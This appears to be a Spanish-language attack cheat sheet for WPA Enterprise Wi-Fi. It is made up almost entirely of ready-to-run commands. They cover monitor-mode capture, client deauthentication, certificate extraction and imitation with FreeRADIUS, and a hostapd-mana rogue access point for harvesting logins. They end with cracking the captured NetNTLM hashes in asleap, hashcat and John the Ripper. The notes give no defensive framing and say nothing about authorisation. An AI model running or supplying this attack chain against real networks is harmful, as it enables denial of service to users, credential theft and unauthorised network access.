WPA Enterprise

1) Habilitar modo monitor en tarjeta inalámbrica.

sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info

2) Captura de paquetes para identificar BSSID, ESSID y canal objetivo.

  • MGT = tipo de autenticación WPA Enterprise.

sudo airodump-ng <interface-mon>

3) Captura de paquetes de BSSID, ESSID y canal específico.

sudo airodump-ng <interface-mon> --bssid <BSSID> --essid <ESSID> -c <channel> -w <file-name> --output-format pcap

Desautenticación de cliente(s).

# Desautenticación dirigida
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>

# Desautenticación broadcast
sudo aireplay-ng -0 1 -a <BSSID> <interface-mon>

4) Deshabilitar modo monitor en tarjeta inalámbrica.

sudo airmon-ng stop <interface-mon> && iw dev <interface> info
sudo airmon-ng stop wlan0mon && iw dev wlan0 info

5) Obtención de certificados.

wireshark <file-name>.cap

5.1) Aplicar filtro de visualización.

wlan.bssid==<bssid> && eap && tls.handshake.certificate

5.2) Exportar y guardar certificados.

  • Extensible Authentication Protocol -> Transport Layer Security -> TLSvX Record Layer: Handshake Protocol: Certificate -> Handshake Protocol: Certificate -> Certificates

  • Clic derecho -> Export Packet Bytes -> guardar certificado con extensión .der.

5.3) Obtener información del certificado y verificar su fecha de vencimiento.

openssl x509 -inform der -in <certificate-filename>.der -text | more
openssl x509 -in <certificate-filename>.der -noout -enddate

6) Instalación de FreeRADIUS.

sudo apt install freeradius

6.1) Configuración de certificado ca.cnf.

sudo -s
cd /etc/freeradius/3.0/certs
nano ca.cnf
ca.cnf
[certificate_authority]
countryName             = <countryName>
stateOrProvinceName     = <stateOrProvinceName>
localityName            = <localityName>
organizationName        = <organizationName>
emailAddress            = <emailAddress>
commonName              = <commonName>

6.2) Configuración de certificado server.cnf.

sudo -s
cd /etc/freeradius/3.0/certs
nano server.cnf
server.cnf
[server]
countryName             = <countryName>
stateOrProvinceName     = <stateOrProvinceName>
localityName            = <localityName>
organizationName        = <organizationName>
emailAddress            = <emailAddress>
commonName              = <commonName>

6.3) Generación de certificados.

sudo -s
cd /etc/freeradius/3.0/certs
rm dh
make

Si ejecutamos make pero los certificados ya existen, no podremos sobrescribirlos. Tenemos que ejecutar make destroycerts para limpiar primero.

7) Instalación y configuración de hostapd-mana.

sudo apt install hostapd-mana

7.1) Creación y configuración de archivo rogue-ap.conf.

sudo -s
cd /etc/hostapd-mana/
nano rogue-ap.conf

7.2) Creación y configuración de archivo rogue-ap.eap_user.

sudo -s
cd /etc/hostapd-mana/
nano rogue-ap.eap_user

8) Inicio de rogue access points.

sudo hostapd-mana /etc/hostapd-mana/rogue-ap.conf

9) Cracking.

# asleap
asleap -C <challenge> -R <response> -W <path-wordlist>

# Hashcat
hashcat -m 5500 hash.txt <path-wordlist>
hashcat -m 5500 hash.txt --show

# John the Ripper
john --format=netntlm --wordlist=<path-wordlist> hash.txt
john --format=netntlm hash.txt --show

Última actualización